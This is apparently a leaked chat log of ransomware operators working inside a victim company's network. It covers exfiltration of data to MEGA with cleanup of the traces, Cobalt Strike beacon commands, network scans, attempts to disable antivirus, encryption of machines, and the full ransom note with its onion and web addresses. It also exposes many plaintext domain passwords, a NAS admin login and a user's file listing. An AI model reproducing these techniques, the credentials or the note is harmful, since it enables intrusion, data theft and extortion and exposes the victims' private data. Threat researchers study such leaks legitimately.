files and it will take 2 gb, about 20 min. 
MegaNZ usage 1) Create folder for files 2) Uploads exe and dll files to created folder 3) Start background MEGAcmdServer.exe 4) Use the commands: > MEGAclient.exe update --auto=off # disable autoupdate for megacmd > MEGAclient.exe login login password # init session by creds > MEGAclient.exe # check connection > MEGAclient.exe put -q --ignore-quota-warn test.txt # upload file to acc storage [-q background process] > MEGAclient.exe ls # check remote directory > MEGAclient.exe logout # end session > MEGAclient.exe quit # kill MEGAcmdServer.exe 5) Remove special folder for MEGAcmd. 6) Remove update task from schtasks: > schtasks /query /FO list | findstr /i "mega" > SCHTASKS /TN "\mega\ FULL NAME HERE" /DELETE /F example: > MEGAclient.exe update --auto=off Automatic updates disabled > MEGAclient.exe login supertest@mail.test P@$$w0rd > MEGAclient.exe whoami Account e-mail: supertest@mail.test > MEGAclient.exe put -q --ignore-quota-warn C:\temp\test.txt > MEGAclient.exe ls test.txt > MEGAclient.exe logout Logging out... > MEGAclient.exe quit > schtasks /query /FO list | findstr /i "mega" Folder: \MEGA TaskName: \MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000 > SCHTASKS /TN "\MEGA\MEGAcmd Update Task S-1-5-10-1145623454-6237456245-1243533621-3000" /DELETE /F ``Console mega client''. WW99NAS - Synology DiskStation - Mozilla Firefox ======= [backspace]Ui0wyarwy08!Watray0n08 ```ggZxzf8Z1rhnIzswMo86-Q so and so кудаjyszkivtedxvrqbbit@upived.online teguiQWERmjsd to anonymous disposable mailchat through torregej ak heremeganz2 gba further tell me how to do it faster to start in the archive):zany_face:so what to 7zip and see you tomorrow? [-] screenshot from desktop 1 is empty ``I mean the screenshot`` Directory of C:\Users\Djarden\Desktop 01/02/2021 10:07 AM . 01/02/2021 10:07 AM . 
07/23/2019 08:05 AM 9,780,208 05 loyalty log on 07.23.2019 cargo not working.txt 02/04/2019 02:23 PM 1,097 1 Everything you need.xlsx - Shortcut.lnk 02/12/2019 01:55 PM 2,153 2018FirewallReview .xlsx - Shortcut.lnk 08/29/2019 09:03 PM 59,664 2019 Import into PDI.xlsx 10/16/2019 03:46 PM 2,368 2019 Wash and Membership Price Changes.xlsx - Shortcut.lnk 07/22/2019 07:39 AM 0 60bainbridge.txt 08/22/2020 01:15 PM 1,049,521 Base CCC Discounts.xlsx 01/31/2019 09:10 PM 1,104 Calls.xlsx - Shortcut.lnk 01/30/2018 08:58 AM 1,075 ccc - Shortcut.lnk 01/10/2020 09:59 AM 11,573 Copy of Declined Card Log for 31.xlsx 06/05/2019 10:22 AM 400 Daily Processing.appref-ms 04/20/2017 03:09 PM DBF files 11/04/2019 02:09 PM 0 DRB times.txt 01/09/2019 12:53 PM 1,303 Dropbox.lnk 06/01/2016 12:29 PM 22,528 Email on Phone Instructions.doc 06/27/2019 10:12 PM 1,517 Examples of spam.txt 10/24/2019 01:56 PM Express_ENU 03/07/2019 09:02 AM 573 Fast Pass Lookup.sql 01/24/2019 09:51 AM 2,466 GitHub Desktop.lnk 09/10/2019 10:46 AM 11,233,441 HHSupport_20190910_1144.zip 07/19/2019 02:15 PM 54 I auditor.txt 11/23/2020 09:15 AM 9,175,040 Intranet.mdb 01/11/2019 12:21 PM ipad crap 11/27/2018 04:16 PM 632 IT - Shortcut.lnk 06/19/2019 03:32 PM 516 Kingshighway email.txt 08/09/2019 12:11 PM 57,300 KingshighwayLoyalty.xlsx 01/06/2020 11:26 AM Logs from #61 01/06/2020 11:27 AM 4,703 Logs from #61.zip 12/11/2019 12:25 PM 10 logs.txt 07/22/2019 07:46 AM 1,271,961 Loyalty log 5 after loyalty code change.txt 10/24/2019 09:34 AM Lty Database #22 06/02/2018 08:06 AM 701 Marketing Folder.lnk 09/16/2019 08:34 AM 1,324 MarketingPLUs .xlsx - Shortcut (2).lnk 04/03/2020 08:28 AM 1,295 Microsoft SQL Server Management Studio 18.lnk 01/30/2018 12:12 PM Mobile Device Center Windows 10 1709 Fix 02/06/2019 05:19 PM 775 My F Drive Folder.lnk 09/20/2019 01:42 PM 16,734 NATHAN MARY.docx 01/06/2020 10:43 AM New folder 06/18/2019 12:03 PM Notes to portal 12/03/2019 09:00 AM 2,435 OneNote 2016.lnk 02/07/2018 11:11 AM 4,089 Phone & 
Internet Providers.xls - Shortcut.lnk 08/11/2020 09:39 AM Printer 06/19/2019 10:11 AM Program Data Zip 12/24/2020 11:55 AM 87,778 Program Data Zip (2).zip 08/24/2017 02:50 PM 4,064 Program License.lnk 01/31/2017 02:40 PM 1,215 Remote Desktop Connection.lnk 01/22/2020 10:48 AM 2,359 RemoteDesktopManagerFree.lnk 01/06/2020 10:48 AM 2,236 RingCentral Meetings.lnk 09/19/2019 02:44 PM 1,361 Safety Tablets and Iauditor Info.lnk 01/02/2021 10:07 AM 2,250 Slack.lnk 07/14/2018 12:53 PM 1,342 Spotify.lnk 10/20/2019 05:13 PM 2,141 SQL Edits.xlsx - Shortcut.lnk 05/07/2018 03:27 PM 1,134 System Scheduler.lnk 12/11/2019 03:33 PM Tickets 02/19/2020 11:14 AM 906 Transfer Look up.sql 07/18/2019 04:07 PM 9,471,921 Unit 05 Loyalty Log issues with Cargo Charges.txt 11/13/2019 12:51 PM 18,459 Unit 31 11/12/2019.xlsx 01/06/2020 10:44 AM 770,963 Unit 61 files 01062020.zip 02/07/2019 01:11 PM 2,390 Upgrading internet service providers.xlsx - Shortcut.lnk 02/12/2019 01:56 PM 19,879 waterway 2-11.xlsx 04/22/2019 11:57 AM 17,690 waterway 4-22.xlsx 05/15/2019 10:18 AM 17,953 waterway 5-9.xlsx 01/30/2018 11:47 AM 2,435 Windows Mobile Device Center.lnk 07/24/2018 12:40 PM 3,486 wwsql ccc KingshighwayLoyalty.odc he doesn't have any notes on his desktop by any chance? DJARDEN maybe it's there maybe we can get his backup correspondence they must have access within the car he probably deleted all the way there's no fucking thing or on the cars maybe he can find something on nimble try it maybe sauron can look it up?it's a slack, i'm for me, where's it from and where? ok, i'll check his history, he also has info on nimbleDJARDEN\c$\Users\DjardenDo you know where to click x to win? try him, i don't) `dressingAUDY\administrator DressinGaudy4` have you tried him? 
```
PID    PPID   Name                                        Arch  Session  User
---    ----   ----                                        ----  -------  ----
0      0      [System Process]
4      0      System                                      x64   0        NT AUTHORITY\SYSTEM
2320   4      smss.exe                                    x64   0        NT AUTHORITY\SYSTEM
1532   10816  HostedAgent.exe                             x86   0        NT AUTHORITY\SYSTEM
1988   1532   conhost.exe                                 x64   0        NT AUTHORITY\SYSTEM
7364   1532   logWriter.exe                               x86   0        NT AUTHORITY\SYSTEM
12808  7364   conhost.exe                                 x64   0        NT AUTHORITY\SYSTEM
2444   2436   csrss.exe                                   x64   0        NT AUTHORITY\SYSTEM
2520   2512   csrss.exe                                   x64   1        NT AUTHORITY\SYSTEM
2528   2436   wininit.exe                                 x64   0        NT AUTHORITY\SYSTEM
2656   2528   services.exe                                x64   0        NT AUTHORITY\SYSTEM
2416   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
2992   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
5264   2992   WmiPrvSE.exe                                x64   0        NT AUTHORITY\NETWORK SERVICE
8920   2992   rundll32.exe                                x64   1        DRESSINGAUDY\Administrator
13528  2992   WmiPrvSE.exe                                x64   0        NT AUTHORITY\SYSTEM
27592  2992   WmiPrvSE.exe                                x86   0        NT AUTHORITY\NETWORK SERVICE
38536  2992   ApplicationFrameHost.exe                    x64   1        DRESSINGAUDY\Administrator
3052   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
3216   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
3224   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
3364   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
3436   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
3644   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
4364   2656   svchost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
4608   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
5012   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
5180   2656   spoolsv.exe                                 x64   0        NT AUTHORITY\SYSTEM
5268   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
5336   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
5372   2656   BaCBTStatusTracking.exe                     x86   0        NT AUTHORITY\SYSTEM
5380   2656   BackupExtender.exe                          x86   0        NT AUTHORITY\SYSTEM
5404   2656   Microsoft.ActiveDirectory.WebServices.exe   x64   0        NT AUTHORITY\SYSTEM
5416   2656   LMIGuardianSvc.exe                          x64   0        NT AUTHORITY\SYSTEM
5436   2656   snmp.exe                                    x64   0        NT AUTHORITY\SYSTEM
5444   2656   ramaint.exe                                 x64   0        NT AUTHORITY\SYSTEM
5480   2656   QBIDPService.exe                            x86   0        NT AUTHORITY\SYSTEM
5512   2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
34252  5512   w3wp.exe                                    x64   0        IIS APPPOOL\DefaultAppPool
5520   2656   dns.exe                                     x64   0        NT AUTHORITY\SYSTEM
5536   2656   dsm_sa_eventmgr64.exe                       x64   0        NT AUTHORITY\SYSTEM
5560   2656   dsm_sa_datamgr64.exe                        x64   0        NT AUTHORITY\SYSTEM
5568   2656   QBCFMonitorService.exe                      x86   0        NT AUTHORITY\SYSTEM
5576   2656   ScreenConnect.ClientService.exe             x86   0        NT AUTHORITY\SYSTEM
4936   5576   ScreenConnect.WindowsClient.exe             x64   1        DRESSINGAUDY\Administrator
11660  5576   ScreenConnect.WindowsClient.exe             x64   1        NT AUTHORITY\SYSTEM
5600   2656   sqlbrowser.exe                              x86   0        NT AUTHORITY\LOCAL SERVICE
5608   2656   sqlwriter.exe                               x64   0        NT AUTHORITY\SYSTEM
5620   2656   svchost.exe                                 x64   0        NT AUTHORITY\NETWORK SERVICE
5732   2656   SSUService.exe                              x86   0        NT AUTHORITY\SYSTEM
5740   2656   ismserv.exe                                 x64   0        NT AUTHORITY\SYSTEM
5832   2656   QBDBMgrN.exe                                x86   0        NT AUTHORITY\SYSTEM
5848   2656   atashost.exe                                x86   0        NT AUTHORITY\SYSTEM
5864   2656   dfsrs.exe                                   x64   0        NT AUTHORITY\SYSTEM
7680   2656   vds.exe                                     x64   0        NT AUTHORITY\SYSTEM
7784   2656   TmListen.exe                                x64   0        NT AUTHORITY\SYSTEM
12008  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
13712  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
16748  13712  dasHost.exe                                 x64   0        NT AUTHORITY\LOCAL SERVICE
13808  2656   msdtc.exe                                   x64   0        NT AUTHORITY\NETWORK SERVICE
13916  2656   svcGenericHost.exe                          x86   0        NT AUTHORITY\NETWORK SERVICE
14124  2656   Intuit.QBDT.Webconnector.QBWCMonitor.exe    x86   0        NT AUTHORITY\SYSTEM
13968  14124  Intuit.QBDT.Webconnector.Application.exe    x86   1        DRESSINGAUDY\Administrator
14496  2656   TmCCSF.exe                                  x64   0        NT AUTHORITY\SYSTEM
15348  2656   Ntrtscan.exe                                x64   0        NT AUTHORITY\SYSTEM
16340  2656   LogMeIn.exe                                 x64   0        NT AUTHORITY\SYSTEM
19640  2656   svchost.exe                                 x64   0        NT AUTHORITY\SYSTEM
2672   2528   lsass.exe                                   x64   0        NT AUTHORITY\SYSTEM
2580   2512   winlogon.exe                                x64   1        NT AUTHORITY\SYSTEM
3124   2580   dwm.exe                                     x64   1        Window Manager\DWM-1
36984  2580   fontdrvhost.exe                             x64   1        DRESSINGAUDY\Administrator
41508  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
45152  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
45596  2580   mstsc.exe                                   x86   1        NT AUTHORITY\SYSTEM
2932   3484   sihost.exe                                  x64   1        DRESSINGAUDY\Administrator
3848   15192  PccNtMon.exe                                x64   1        DRESSINGAUDY\Administrator
4376   5632   explorer.exe                                x64   1        DRESSINGAUDY\Administrator
14284  12980  QBWebConnector.exe                          x86   1        DRESSINGAUDY\Administrator
```

what processes are active? and not from the lada?

get your LAN DC up there, there's an admin AV

I turned on RDP, now let me in, but it does not let me into Windows - an error, something with the procylem

Where can you not go?

https://www.bleepingcomputer.com/forums/t/617257/ransomnotecleaner-remove-ransom-notes-left-behind/

Give me a session

/agent-deactivate-start-stop.html

```
Pinging accounting2.DressinGaudy.local [172.16.1.247] with 32 bytes of data:
Reply from 172.16.1.15: Destination host unreachable.
```

Trend Micro is scrambling the note? You have to turn it off anyway.

It's not scrambling the text, it's deleting it. This can be fixed, but the AV will still block the build itself.

Did you throw dasox from a different place on the DC?

```
====== AntiVirus ======
Engine       : Trend Micro Security Agent
ProductEXE   : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe

Engine       : Windows Defender
ProductEXE   : windowsdefender://
ReportingEXE : %ProgramFiles%\Windows Defender\MsMpeng.exe

Engine       : Trend Micro Security Agent
ProductEXE   : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\Pccntmon.exe
ReportingEXE : C:\Program Files (x86)\Trend Micro\Client Server Security Agent\tmwscsvc.exe
```

fuck... can't kill the AV process like this

get up there

just Trend Micro? ahah

vs still deleted

well, process poleliv through cmd

can't kill the AV process?

let's make a vid and spread out

why on the DC?
can't go to the DC; if on the DC, can't get to the DC, how?

in any case, drop the AV. The message gets deleted: definitely uploaded a readme with the content "123" by hand, threw it in and it disappeared. Disable the AV and WinDef; not sure that it encrypts everything

> it starts, and the AV blocks the process

bastards, they will remove the download and the uploaded file 123 in readme.txt

here I copied it; type readme - asked to download what file?

leave through echo)

```
beacon> shell echo 1 > C:\readme.txt
[*] Tasked beacon to run: echo 1 > C:\readme.txt
[+] host called home, sent: 53 bytes

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

01/19/2021  05:07 PM                 4 readme.txt
               1 File(s)              4 bytes
               0 Dir(s)  541,679,837,184 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
1
```

I throw it in the root and it disappears

```
beacon> upload /home/wevvewe/Desktop/readme.txt
[*] Tasked beacon to upload /home/wevvewe/Desktop/readme.txt as readme.txt
[+] host called home, sent: 932 bytes

beacon> shell dir readme.txt
[*] Tasked beacon to run: dir readme.txt
[+] host called home, sent: 45 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is CC70-3A4E

 Directory of C:\

File Not Found

beacon> pwd
[*] Tasked beacon to print working directory
[+] host called home, sent: 8 bytes
[*] Current directory is C:\
```

echo 1 > C:\readme.\ exactly there?

I don't know if it's correct, and I don't know if everything is just put in C:\; put it on the same 5 PCs

yes, by hand everything encrypts, only the file doesn't appear

by hand

* put it on the DC by hand

don't know how long it will take?

- Trend and the other things, have you turned off everything?

- And on the others?

Here on accounting2: 930b fil 01/19/2021 16:52:06 readme.txt

```
beacon> ls C:\
[*] Tasked beacon to list files in C:\
[+] host called home, sent: 20 bytes
[*] Listing: C:\

 Size     Type  Last Modified            Name
 ----     ----  -------------            ----
          dir   04/24/2014 10:17:32      $AVG
          dir   05/05/2014 14:50:25      $Recycle.Bin
          dir   01/13/2021 00:36:32      $WinREAgent
          dir   03/11/2014 14:27:30      _FedEx
          dir   04/12/2013 16:26:21      BIN
          dir   06/13/2015 09:33:14      bootdrv
          dir   06/13/2015 09:33:13      CMCLanDesk
          dir   01/15/2021 17:30:47      Config.Msi
          dir   12/01/2020 12:12:25      CounterPoint SQL Tutorials
          dir   01/19/2021 10:17:28 PM   CPAccounting
          dir   04/03/2013 14:41:34      dell
          dir   07/14/2009 00:08:56      Documents and Settings
          dir   03/10/2014 13:00:44      Drivers
          dir   01/24/2018 11:46:42      HP_Color_LaserJet_Pro_MFP_M477
          dir   02/28/2014 15:46:04      HP_ePrint
          dir   10/07/2013 16:59:18      HP_ePrint_Mobile
          dir   03/04/2014 10:55:01      HP_LJ300-400_color_MFP_M375-M475
          dir   10/07/2013 16:53:39      HP_LJM425_scan_upgrade_11_1
          dir   07/23/2020 22:10:48      inetpub
          dir   06/23/2016 08:37:33      Intel
          dir   04/27/2016 01:35:59      Logs
          dir   02/28/2018 10:34:09      MATS
          dir   12/07/2019 03:14:52      PerfLogs
          dir   07/23/2020 22:38:46      Program Files
          dir   09/10/2020 11:54:42      Program Files (x86)
          dir   07/24/2020 09:52:37      ProgramData
          dir   07/23/2020 20:07:22      Recovery
          dir   03/26/2013 05:21:53      System Recovery
          dir   01/18/2021 19:16:12      System Volume Information
          dir   02/28/2014 15:06:33      Temp
          dir   07/23/2020 19:44:04      Users
          dir   01/13/2021 01:04:40      Windows
          dir   10/04/2016 11:30:40      WindowsUpdates Batch files
 1kb      fil   01/19/2021 16:52:06      .rnd.WSFWM
 535b     fil   01/19/2021 16:52:06      BOOTNXT.WSFWM
 28kb     fil   01/18/2021 16:52:06      dell.sdr.WSFWM
 8kb      fil   01/18/2021 09:15:14      DumpStack.log.tmp
 0b       fil   06/21/2013 12:57:16
 6mb      fil   04/12/2013 16:27:45      FSMMSILog.txt
 5gb      fil   01/18/2021 09:15:12      hiberfil.sys
 476kb    fil   01/05/2002 03:40:20      msvcp70.dll
 336kb    fil   01/05/2002 03:37:28      msvcr70.dll
 8gb      fil   01/18/2021 09:15:14      pagefile.sys
 930b     fil   01/19/2021 16:52:06      readme.txt
 256mb    fil   01/18/2021 09:15:14      swapfile.sys
 1kb      fil   01/16/2015 12:21:09      tcg quaterly run.txt

beacon> shell dir C:\readme.txt
[*] Tasked beacon to run: dir C:\readme.txt
[+] host called home, sent: 48 bytes
[+] received output:
 Volume in drive C is OS
 Volume Serial Number is B825-1C82

 Directory of C:\

01/19/2021  04:52 PM               930 readme.txt
               1 File(s)            930 bytes
               0 Dir(s)  842,931,138,560 bytes free

beacon> shell type C:\readme.txt
[*] Tasked beacon to run: type C:\readme.txt
[+] host called home, sent: 49 bytes
[+] received output:
```

All of your files are currently encrypted. Backups were encrypted or deleted, same as Shadow Copies.
If you try to use any additional recovery software - the files might be damaged, but if you are still willing to try - try it on the data of the lowest value.
To make sure that we REALLY CAN recover all of the encrypted data - we offer you to decrypt 2 random files of your choice completely free of charge.
The faster you reply - the easier and cheaper it will be.
To receive information on the price of the recovery software you can contact our team directly for further instructions through our website: TOR VERSION : (you should download and install TOR browser first https://torproject.org) http://contirecj4hbzmyzuydyzrvm2c65blmvhoj2cvf25zqj2dwrrqcq5oad.onion/ HTTPS VERSION : https://contirecovery.best ---BEGIN ID--- TZhuHwa9cdqOe3RnHObcHHHJFFVZUjBpwFXziFQud63TrrrLqJ3ikFUXJn1BfjYF ---END ID--- ``We have to cut off the av and restart it. DressinGaudy\canton GMC041985 DressinGaudy\corporate GCouture DressinGaudy\DG108 Gaudy081 DressinGaudy\jmr 1515sasy DressinGaudy\ROOK RR#2212 DressinGaudy\DG102 Gaudy021 DressinGaudy\GM103 Gaudy031 DressinGaudy\tim true0407 DressinGaudy\DG105 Gaudy051 DressinGaudy\GCPOS8A-TGM1 Password1 DressinGaudy\GM106 Gaudy061 DressinGaudy\GCPOS5A-LGM3 register ``Disconnect the micro)`` Yes, I already pulled[ ](https://mediaeveryone.com/group/gaudyme-com?msg=6biKzY5QiYNKbKihb) try to unshare the c$``. 172.16.1.247:7680 172.16.1.247:6783 172.16.1.247:5357 172.16.1.247:5040 172.16.1.247:2107 172.16.1.247:2105 172.16.1.247:2103 172.16.1.247:1801 172.16.1.247:139 172.16.1.247:135 172.16.1.247:80 172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY) ``Trend Micro Inc. should be shut down for an av[ ](https://mediaeveryone.com/group/gaudyme-com?msg=MtM65JGes69QGu2ov) ``what av? if another process won't jump into c$-but they were dropping out after 10-15 seconds-sessions, so I'm pulling wmic - rpc server is unavailable do remote-exec psexec - everything okily you about psex?[ ](https://mediaeveryone.com/group/gaudyme-com?msg=q83XW27j2ohmjkmLC) ??? and rpc open? it works psex? 
strange that RPC does not work

```
Teemo[GAUDY-DC2]SYSTEM */2580|2021Jan20 01:33:12> shell net view \\172.16.1.247 /all
[*] Tasked beacon to run: net view \\172.16.1.247 /all
[+] host called home, sent: 59 bytes
[+] received output:
Shared resources at \\172.16.1.247

Share name  Type  Used as  Comment
-------------------------------------------------------------------------------
IPC$        IPC            Remote IPC
print$      Disk           Printer Drivers
The command completed successfully.
```

RPC doesn't work at all

RPC on the first one works?

Accounting2.DressinGaudy.local: 172.16.1.247 - on disk access it says no name found
Label.DressinGaudy.local: 172.16.1.61
DGW-PC.DressinGaudy.local: 172.16.1.83
Gaudy-DC2.DressinGaudy.local: 169.254.32.72
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15 - is the same computer as above
Gaudy-DC2.DressinGaudy.local: 169.254.113.11 - is the same computer as the above two
Gaudy-DC2.DressinGaudy.local: 169.254.196.198 - is the same computer as the three above
Gaudy-DC2.DressinGaudy.local: 172.16.1.15 - is the same computer as the four above
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103
MikaDesktop.DressinGaudy.local: 192.168.2.149

And there were 7 (5); how many PCs in total?

```
[*] Listing: C:\

 Size     Type  Last Modified         Name
 ----     ----  -------------         ----
          dir   01/19/2021 16:18:48   $GetCurrent
          dir   11/02/2020 15:50:17   $Recycle.Bin
          dir   01/19/2021 16:18:49   $SysReset
          dir   01/19/2021 16:18:49   $WinREAgent
          dir   01/19/2021 16:18:52   _FedEx
          dir   01/19/2021 16:18:49   AMD
          dir   01/19/2021 16:18:49   ATI
          dir   01/19/2021 16:18:49   DG
          dir   07/14/2009 00:08:56   Documents and Settings
          dir   01/19/2021 16:18:50   ESD
          dir   01/19/2021 16:18:50   FedEx
          dir   01/19/2021 16:18:50   Logs
          dir   01/19/2021 16:18:50   MSOCache
          dir   01/19/2021 16:18:51   New Pics
          dir   12/07/2019 03:14:52   PerfLogs
          dir   01/19/2021 16:18:51   Program Files
          dir   01/19/2021 16:18:51   Program Files (x86)
          dir   01/19/2021 16:18:51   ProgramData
          dir   01/19/2021 16:18:51   Recovery
          dir   01/19/2021 16:18:44   System Volume Information
          dir   02/02/2015 15:03:13   temp
          dir   01/19/2021 16:18:52   Users
          dir   01/19/2021 14:41:20   Windows
          dir   12/06/2019 09:34:02   Windows10Upgrade
 1kb      fil   01/19/2021 16:18:48   .rnd.WSFWM
 535b     fil   01/19/2021 16:18:48   BOOTNXT.WSFWM
 947kb    fil   01/19/2021 16:18:48   count_log_out.txt.WSFWM
 8kb      fil   01/13/2021 02:10:14   DumpStack.log.tmp
 7mb      fil   01/19/2021 16:18:48   FSMMSILog.txt.WSFWM
 11gb     fil   01/13/2021 02:10:10   hiberfil.sys
 883kb    fil   12/01/2006 22:37:14   msdia80.dll
 15gb     fil   01/13/2021 02:10:14   pagefile.sys
 1kb      fil   01/19/2021 16:18:48   SOCIAL-MEDIIA1.txt.WSFWM
 34b      fil   09/26/2016 11:55:16   Start Windows Updates.bat
 32b      fil   09/26/2016 11:54:46   Stop Windows Updates.bat
 256mb    fil   01/13/2021 02:10:14   swapfile.sys
```

It leaves the files encrypted, so why does it not leave a note anymore? Are we ok?

There are no disks, as if there is no account, but the hostnames are all there. I pinged all the rest?

All 5 machines are pulled, all ready?

Accounting2.DressinGaudy.local: 172.16.1.247
Label.DressinGaudy.local: 172.16.1.61
DGW-PC.DressinGaudy.local: 172.16.1.83
Gaudy-DC2.DressinGaudy.local: 169.254.32.72
GAUDY-RDP1.DressinGaudy.local: 172.16.1.15
Gaudy-DC2.DressinGaudy.local: 169.254.113.11
Gaudy-DC2.DressinGaudy.local: 169.254.196.198
Gaudy-DC2.DressinGaudy.local: 172.16.1.15
GM-Tyler-Office.DressinGaudy.local: 192.168.1.103
MikaDesktop.DressinGaudy.local: 192.168.2.149

Is everything ready?

1TB - delete in 5 minutes.

My screenshot above is exactly all there is; delete the snaps, etc.

Read everything that is there, so what is complete?

Still do it completely)

files that are from 2013-2015, a terabyte drive and the default login and password. It is doubtful that there was anything good there.

QNAP Turbo NAS http://172.16.1.14:8080/cgi-bin/ admin admin

QNAP Turbo NAS

only find us; there is one server and half of the company. I think the files will not collect; here under 0, can you close?

I think that's all here

user9user4@tl1

Give everyone here)

avsix.com - nothing pulls there, some nonsense

```
172.16.1.10
172.16.1.15
172.16.1.74
172.16.1.55
172.16.1.244
172.16.1.71
172.16.1.248
172.16.1.75
172.16.1.248
172.16.1.76
172.16.1.242
192.168.1.103
172.16.1.247
172.16.1.85
172.16.1.75
172.16.1.61
172.16.1.62
192.168.2.149
172.16.1.83
172.16.1.78
172.16.1.71
```

user7 should be @user7

@user3 is busy here with @user3

let's go to random; whatever you want to help with?
> on all of them yes sniper gave >[-] Invoke_3 on EntryPoint failed.then reserch admins)or uzakili adminroot there's a passthrough there passvot clears yes by the way ``` DressinGaudy\canton GMC041985 DressinGaudy\corporate GCouture DressinGaudy\DG108 Gaudy081 DressinGaudy\jmr 1515sasy DressinGaudy\ROOK RR#2212 DressinGaudy\DG102 Gaudy021 DressinGaudy\GM103 Gaudy031 DressinGaudy\tim true0407 DressinGaudy\DG105 Gaudy051 DressinGaudy\GCPOS8A-TGM1 Password1 DressinGaudy\GM106 Gaudy061 DressinGaudy\GCPOS5A-LGM3 register DressinGaudy\GCPOS4A-LGM2 register DressinGaudy\GCPOS3A-LGM1 register DressinGaudy\GCPOS17A-LDG1 register DressinGaudy\GCPOS18A-LDG2 register DressinGaudy\GCPOS10A-TGM3 register DressinGaudy\GCPOS11A-CDG1 register DressinGaudy\GCPOS12A-CDG2 register DressinGaudy\GCPOS13A-CDG3 register DressinGaudy\GCPOS1A-TDG1 register DressinGaudy\GCPOS2A-TDG2 register DressinGaudy\GCPOS6A-TXDG1 register DressinGaudy\GCPOS7A-TXDG2 register DressinGaudy\GCPOS9A-TGM2 register DressinGaudy\GCPOS9A-TGM2 register ``` [-] Invoke_3 on EntryPoint failed. 
192.168.2.164 - did not open
172.16.1.11 - avaya, telephony
172.16.1.20 - canon iR-ADV C2225i
172.16.1.22 - HP LaserJet M402n
172.16.1.58 - HP OfficeJet Pro 8710
172.16.1.14 - us, qnap

There's a hell of a lot of trouble,

```
172.16.1.58:443
172.16.1.22:443
172.16.1.20:443
172.16.1.14:443
172.16.1.11:443
172.16.1.14:22 (SSH-2.0-OpenSSH_7.3)
172.16.1.1:22 (SSH-2.0-OpenSSH_7.2)
172.16.1.12:445
172.16.1.14:445 (platform: 500 version: 6.1 name: GAUDY-LOCAL domain: WORKGROUP)
172.16.1.15:445 (platform: 500 version: 10.0 name: GAUDY-DC2 domain: DRESSINGAUDY)
172.16.1.61:445 (platform: 500 version: 10.0 name: LABEL domain: DRESSINGAUDY)
172.16.1.83:445 (platform: 500 version: 10.0 name: DGW-PC domain: DRESSINGAUDY)
172.16.1.247:445 (platform: 500 version: 10.0 name: ACCOUNTING2 domain: DRESSINGAUDY)
```

```
192.168.1.103:445 (platform: 500 version: 10.0 name: GM-TYLER-OFFICE domain: DRESSINGAUDY)
```

```
192.168.2.164:443
192.168.2.149:445 (platform: 500 version: 10.0 name: MIKADESKTOP domain: DRESSINGAUDY)
192.168.2.164:445 (platform: 500 version: 6.2 name: EPSONCB1B7F domain: WORKGROUP)
```

```
dn:CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>objectClass: top
>objectClass: group
>cn: Backup Operators
>description: Backup Operators can override security restrictions for the sole purpose of backing up or restoring files
>distinguishedName: CN=Backup Operators,CN=Builtin,DC=DressinGaudy,DC=local
>instanceType: 4
>whenCreated: 20140219183137.0Z
>whenChanged: 20180215190335.0Z
>uSNCreated: 13360
>uSNChanged: 13360
>name: Backup Operators
>objectGUID: {3E590A3C-D066-458B-BA24-74240463D912}
>objectSid: S-1-5-32-551
>adminCount: 1
>sAMAccountName: Backup Operators
>sAMAccountType: 536870912
>systemFlags: -1946157056
>groupType: -2147483643
>objectCategory: CN=Group,CN=Schema,CN=Configuration,DC=DressinGaudy,DC=local
>isCriticalSystemObject: TRUE
>dSCorePropagationData: 16010101000000.0Z
```

Scan 445 and the web in their subnets. I also noticed such a man is
